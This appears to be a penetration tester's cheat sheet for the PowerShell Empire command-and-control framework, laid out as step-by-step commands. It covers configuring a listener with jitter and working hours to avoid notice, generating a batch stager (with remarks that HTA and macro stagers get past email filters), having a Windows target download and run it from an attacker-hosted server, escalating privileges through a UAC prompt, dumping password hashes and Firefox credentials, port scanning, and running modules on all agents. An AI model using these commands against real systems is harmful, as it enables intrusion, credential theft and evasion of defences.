PowerShell Empire

Modules:

  • PowerBreach: Persistence

  • Posh-SecMod: Discovery

  • PowerSploit: CodeEx,Keylog,etc

  • PowerUp : privesc

  • PowerView : Enum, includes: "Find Interesting Files"

Module Categories:

  • CodeEx

  • Coll

  • Exfil

  • Expl

  • Fun

  • Lateral

More Module Categories:

  • Management: email/runas/hash

  • Persistence: tasksched/reg/script

  • Recon: Enum

  • SitAwareness: scan/netstat

  • Trollsploit: RickRoll fun

Getting Started

Linux:
cd /opt/empire/setup
sudo ./reset.sh   ..cleanup previous history

Normal:
sudo ./empire

agents = sessions
info = show options
listeners = multihandler

Module

searchmodule privesc
listeners
?  ..help for listeners

Listener

uselistener  ..<tab-complete>
uselistener http
info

DefaultJitter  ..give us irregular checks(to hide)
KillDate       ..quit on date
WorkingHours   ..goes silent after time
SlackChannel   ..notifs in Slack

set DefaultDelay 1   ..to make commands faster
Set Host http://10.x.x.x:8080
set Port 8080   ..quirky but helps to do both
info
?   ..help
execute
listener successfully started (like: multihandler)

listeners  ..view current listeners
.. note: could rename from 'http'

Stager

back
usestager  ..<tab-complete>

.. windows/hta   ..good to get past email filters
.. windows/macro ..good to use in Word

use stager windows/launcher_bat
info
set Listener http  ..choose our current
generate           ..created /tmp/launcher.bat

---------------------------------------------------------------
---------------------------------------------------------------
Share with Python:
python3 -m http.server

---------------------------------------------------------------
---------------------------------------------------------------
Windows/Target
Download with: Windows Powershell:

PS> cd .\Desktop\
PS> wget http://x.x.x.x:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat
Desktop > Db-Click Launcher.bat

Connected

Linux: Empire now shows connected!!

agents
interact ABC123SESS
rename Agent1
info  ..hostname, user, process, etc

list listeners
list agents

Doing more

usemodule <tab>
usemodule situational_awareness/host/winenum
.. also cool: collection/FoxDump  ..firefox cred dump

searchmodule powerup
usemodule /privesc/powerup/allchecks

.. Found Unquoted service paths
.. Exe has poor perms
.. Some false-positives

Elevated Modules

back
usemodule powershell/credentials/powerdump*
* means we need higher creds

info
run   ..error, needs to run in elevated

PrivEsc Modules

back
usemodule privesc/ask  ..will prompt user to accept
.. Unless UAC is set to allow everything

set Listener http
run

agents
.. we now have * higher priv agent
rename 8VDM9S2G AgentHIGH

Powerdump

interact AgentHIGH
usemodule credentials/powerdump*
password-hashes!!

back
shell ipconfig
shell whoami

Portscan

searchmodule portscan
usemodule situational_awareness/network/portscan
info
set Hosts 10.x.x.x
run

All Agents - Powerful

usemodule powershell/credentials/powerdump
info
set Agent all   ..to run on ALL agents
execute

Cleanup

agents
kill all
listeners
kill http
exit

cd /opt/empire/downloads/
cd AgentHIGH
less agent.log  ..LOG of everything and outputs !!!!

cd /opt/empire/setup
sudo ./reset.sh   ..cleanup previous history
PreviousPostgresNextShells

Last updated